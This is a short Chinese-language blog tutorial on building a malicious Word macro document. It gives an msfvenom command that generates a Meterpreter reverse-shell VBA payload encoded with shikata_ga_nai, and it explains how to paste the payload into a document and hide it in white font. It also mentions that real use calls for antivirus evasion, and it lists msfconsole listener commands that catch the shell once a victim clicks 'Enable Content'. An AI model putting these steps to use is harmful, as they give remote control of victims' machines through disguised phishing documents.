随笔 - 4,  文章 - 0,  评论 - 3,  阅读 - 841

1.生成我们的VBA代码

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.59.134 LPORT=4444 -e x86/shikata_ga_nai -i 10 -f vba-exe

执行完成后会生成 2 段代码 第一段代码是 MACRO CODE 宏代码 从这里开始:

到这里结束:

第二段代码:payload

(注意红框一直往下都是)

2.将打开Office对宏的支持

在word选项中的自定义功能区中点击对开发工具的支持,我的是默认开启的。

随便找一个word文件

注意实验的时候要关闭杀毒软件,实际情况中要做免杀的。

ctrl+s保存

把我们的第二段添加到word文档正文里面

这么多异常的字符?傻子都能看出来有问题 怎么办?

我们可以把字体设置为白色,这样就看不出来异常了

把文件另存为

3.我们在攻击机里面启动MSF监听:

msfconsole use exploit/multi/handler set payload windows/meterpreter/reverse_tcp

set lhost 192.168.59.134

set lport 4444

run

4.双击打开我们制作好的文档

5.执行后上线

当目标点击 启用内容 的选型后就会上线

 

posted on   FlipByte  阅读(213)  评论(0编辑  收藏  举报
相关博文:
阅读排行:
· 无需6万激活码!GitHub神秘组织3小时极速复刻Manus,手把手教你使用OpenManus搭建本
· Manus爆火,是硬核还是营销?
· 终于写完轮子一部分:tcp代理 了,记录一下
· 别再用vector<bool>了!Google高级工程师:这可能是STL最大的设计失误
· 单元测试从入门到精通
< 2025年3月 >
23 24 25 26 27 28 1
2 3 4 5 6 7 8
9 10 11 12 13 14 15
16 17 18 19 20 21 22
23 24 25 26 27 28 29
30 31 1 2 3 4 5

点击右上角即可分享
微信分享提示